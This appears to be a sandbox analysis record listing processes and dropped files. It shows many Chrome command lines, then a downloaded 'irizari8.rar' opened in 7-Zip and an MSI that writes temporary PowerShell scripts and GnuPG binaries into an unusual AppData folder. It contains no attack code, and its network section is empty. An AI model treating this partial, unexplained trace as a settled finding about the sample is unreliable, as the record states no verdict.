"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4852 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=1548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3300 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4652 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4908 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4664 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6072 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3268 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6500 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6656 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6816 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6780 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7028 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6192 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6076 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7288 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7552 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7680 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7700 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=7888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8212 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8532 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=8032 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=9104 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=8996 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=8876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=9384 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=8616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9672 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=7876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=3376 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=7984 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=7580 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=7640 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=7648 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9420 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=7728 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=8608 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=9324 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=9128 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=7616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=7620 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=7612 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=7300 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7496 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=9924 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=8184 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=6024 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9368 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8400 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\irizari8.rar"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\installer.msi

C:\Users\Admin\AppData\Local\Temp\MSIA7CB.tmp

C:\Users\Admin\AppData\Local\Temp\MSIA8D6.tmp

C:\Users\Admin\AppData\Local\Temp\MSIA8E6.tmp

C:\Users\Admin\AppData\Local\Temp\MSI7aaa7.LOG

C:\Windows\Installer\MSIAE22.tmp

C:\Windows\Installer\MSIAEEF.tmp

C:\Windows\Installer\MSIAF00.tmp

C:\Windows\Installer\MSIAF20.tmp

C:\Windows\Installer\MSIAF40.tmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jq3uanic.0pc.ps1

C:\Users\Admin\AppData\Local\Temp\pssAF9C.ps1

\??\pipe\crashpad_960_XFMYJHIFPLAFKHJZ

C:\Users\Admin\AppData\Local\Temp\scrAF9A.ps1

C:\Users\Admin\AppData\Local\Temp\msiAF99.txt

C:\Windows\Installer\MSICC6E.tmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libgpg-error-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libsqlite3-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libnpth-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libksba-8.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gnupg.exe

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\dirmngr.exe

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpgsm.exe

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processthreads-l1-1-1.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processthreads-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-processenvironment-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-namedpipe-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-memory-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-localization-l1-2-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-filesystem-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-environment-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-convert-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-crt-conio-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-util-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-timezone-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-sysinfo-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-synch-l1-2-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-synch-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\api-ms-win-core-string-l1-1-0.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\stylers.model.xml

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\libintl-8.dll

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpg-wks-client.exe

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpgtar.exe

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\gpg-check-pattern.exe

